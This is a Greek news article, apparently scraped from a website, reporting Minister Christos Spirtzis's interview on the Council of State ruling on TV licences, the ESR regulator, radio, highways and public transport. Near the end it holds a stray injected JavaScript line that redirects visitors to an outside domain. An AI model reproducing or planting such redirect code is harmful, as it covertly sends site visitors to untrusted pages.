Σπίρτζης: Η απόφαση του ΣτΕ θα εφαρμοσθεί, όπως θα εφαρμοσθεί και η κυβερνητική πολιτική

0
5

 

«Η απόφαση του ΣτΕ θα εφαρμοσθεί, όπως θα εφαρμοστεί τελικά και η πολιτική της κυβέρνησης. Να υπάρχουν, δηλαδή, μόνιμα αδειοδοτημένοι τηλεοπτικοί σταθμοί, που θα έχουν συγκεκριμένο ποιοτικό πλαίσιο λειτουργίας, που θα πληρώνουν για τη λειτουργία τους, που θα έχουν κατ’ ελάχιστον τους εργαζόμενους που ορίζει ο νόμος», τονίζει ο υπουργός Yποδομών, Μεταφορών και Δικτύων Χρήστος Σπίρτζης σε συνέντευξή του στο Αθηναϊκό/Μακεδονικό Πρακτορείο Ειδήσεων.

Ο κ. Σπίρτζης κάνει λόγο για λυσσαλέα μάχη να συνεχιστεί η ίδια κατάσταση στο τηλεοπτικό τοπίο από τους υπάρχοντες τηλεοπτικούς σταθμούς, με την ενεργό βοήθεια της ΝΔ, της Δημοκρατικής Συμπαράταξης, του Ποταμιού και όσων μηχανισμών διαθέτουν, χρησιμοποιώντας θεμιτά και αθέμιτα μέσα, λασπολογώντας και σταματώντας κάθε προσπάθεια για συγκρότηση του ΕΣΡ. «Για να συναινέσει η ΝΔ να συγκροτηθεί το ΕΣΡ, πρέπει να συνεδριάσει με την Ένωση Ιδιωτικών Τηλεοπτικών Σταθμών και να της υποδείξουν ονόματα. Οποιαδήποτε άλλη πρόταση, ακόμη και μελών ή στελεχών της, δεν θα είναι αποδεκτή», συμπληρώνει.

Αναλυτικά, ο κ. Σπίρτζης απαντά σ’ αυτούς που μιλούν για ήττα της κυβέρνησης μετά την απόφαση του ΣτΕ για τις άδειες:  «Η απόφαση του ΣτΕ θα εφαρμοσθεί, όπως θα εφαρμοσθεί τελικά και η πολιτική της κυβέρνησης. Να υπάρχουν, δηλαδή, μόνιμα αδειοδοτημένοι τηλεοπτικοί σταθμοί, που θα έχουν συγκεκριμένο ποιοτικό πλαίσιο λειτουργίας, που θα πληρώνουν για τη λειτουργία τους, που θα έχουν κατ’ ελάχιστο τους εργαζόμενους που ορίζει ο νόμος. Δυστυχώς οι υπάρχοντες τηλεοπτικοί σταθμοί με την ενεργό βοήθεια της ΝΔ, της Δημοκρατικής Συμπαράταξης, του Ποταμιού και όσων μηχανισμών διαθέτουν δίνουν λυσσαλέα μάχη, χρησιμοποιώντας θεμιτά και αθέμιτα μέσα, λασπολογώντας και σταματώντας κάθε προσπάθεια για συγκρότηση του ΕΣΡ, να συνεχιστεί η ίδια κατάσταση στο τηλεοπτικό τοπίο: Κανάλια με προσωρινές άδειες, καναλάρχες που δεν πληρώνουν, δάνεια χωρίς εγγύηση και κυρίως ένα πολιτικό σύστημα και ένα κράτος εξαρτημένο από τη γραμμή που θα δίνουν οι καναλάρχες, με σκοπό την εξυπηρέτηση των συμφερόντων τους.

Μέχρι σήμερα ζήσαμε μια πρωτοφανή αθλιότητα λάσπης και κατασυκοφάντησης. Η δημοσιογραφική δεοντολογία και οι κανόνες λειτουργίας των τηλεοπτικών σταθμών αποτελούν άγνωστες έννοιες για τα κανάλια. Θυμόσαστε τον δήθεν Τούρκο καναλάρχη, τα δήθεν δώρα σε συμμετέχοντες, τις δήθεν παρεμβάσεις στη Δικαιοσύνη; Θυμόσαστε τις δήθεν δεσμεύσεις της ΝΔ για συγκρότηση του ΕΣΡ μετά την εκλογή Προέδρου; Οι δεσμεύσεις τους πήγαν στα βοσκοτόπια της διαπλοκής… Για να συναινέσει η ΝΔ να συγκροτηθεί το ΕΣΡ, πρέπει να συνεδριάσει με την Ένωση Ιδιωτικών Τηλεοπτικών Σταθμών και να της υποδείξουν ονόματα. Οποιαδήποτε άλλη πρόταση, ακόμη και μελών ή στελεχών της, δεν θα είναι αποδεκτή. Περιμένουμε να διαβάσουμε την απόφαση του ΣτΕ, για να δούμε πώς καλύπτονται οι αρμοδιότητες του ΕΣΡ αν δεν μπορεί να λειτουργήσει; Ποιός ελέγχει τους τηλεοπτικούς σταθμούς, την τήρηση του νόμου και της δεοντολογίας; Εκτός κι αν θέλουν να μην υπάρχει, για να μην υπάρχουν άδειες, δεοντολογία, ποινές και τήρηση του νόμου.

Η επιτυχία της προσπάθειάς μας είναι βέβαιη γιατί δεν είναι μια μάχη μόνο δική μας. Είναι μια μάχη ενάντια στα συμφέροντα που λεηλατούν για χρόνια το ελληνικό Δημόσιο και τον ελληνικό λαό, είναι μια μάχη του ελληνικού λαού. Είναι μια μάχη της υγιούς πλευράς του πολιτικού κόσμου που διαχρονικά πάλεψε για την απεξάρτηση και την αυτονομία του από τα επιχειρηματικά συμφέροντα, είτε τον πρωθυπουργό τον έλεγαν Ανδρέα Παπανδρέου είτε Κώστα Καραμανλή. Αυτή τη φορά θα το πετύχουμε» υπογράμμισε ο κ. Σπίρτζης.

Όσον αφορά στην αδειοδότηση των ραδιοφωνικών σταθμών ανέφερε: «Θα ολοκληρωθεί η διαβούλευση του χάρτη συχνοτήτων ραδιοφώνου, θα υπάρξει νομοθετική πρωτοβουλία για τους κανόνες, τις προδιαγραφές και τα χαρακτηριστικά λειτουργίας των ραδιοφωνικών σταθμών, τις θεσμικές προβλέψεις για τη διαφάνεια και τους μηχανισμούς ελέγχου και καθορισμός των διαδικασιών και του τιμήματος. Το βέβαιο είναι ότι και στο ραδιόφωνο η σημερινή κατάσταση αυθαιρεσίας δεν θα συνεχιστεί«.

Σε ό,τι αφορά την πορεία των έργων στους πέντε μεγάλους αυτοκινητοδρόμους, ο υπουργός τονίζει πως προχωρούν με ταχύτατους ρυθμούς προκειμένου να ολοκληρωθούν τον Μάρτιο και στη συνέχεια κύριο μέλημα της κυβέρνησης «θα είναι η ελάφρυνση των διοδίων».

Απαντά στις καταγγελίες για «κατάρρευση των αστικών συγκοινωνιών» σχολιάζοντας μεταξύ άλλων πως «οι στρατοί του παλαιοκομματισμού στον χώρο των αστικών συγκοινωνιών είναι γνωστοί». «Η πλειοψηφία των εργαζομένων στις αστικές συγκοινωνίες δίνει καθημερινή μάχη, για να υπάρχουν αστικές συγκοινωνίες και για να ξεφύγει από τις ομάδες που τον καταπίεζαν πολλά χρόνια» τονίζει και επισημαίνει: «Οι αστικές συγκοινωνίες έχουν πολλά προβλήματα. Ένα από αυτά είναι τα τεράστια χρέη που άφησαν οι διοικήσεις της ΝΔ και της ΔΗΣΥΜ. Κύριο, όμως, πρόβλημα είναι οι νοοτροπίες παρακμής, παραγοντισμού και αδιαφάνειας στον χώρο των αστικών συγκοινωνιών».

Επιπλέον, ο υπουργός δηλώνει κατηγορηματικά πως δεν ιδιωτικοποιούνται οι ΔΕΚΟ που μεταβιβάστηκαν στο Υπερταμείο, λέγοντας χαρακτηριστικά: «Ας σταματήσουν οι υπέρμαχοι των ιδιωτικοποιήσεων της μιας δραχμής να σπεκουλάρουν. Ό,τι ιδιωτικοποιείται είναι στο ΤΑΙΠΕΔ, με δική τους ευθύνη και με δεσμεύσεις που ανέλαβαν εκείνοι για τη χώρα, όταν κυβερνούσαν».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here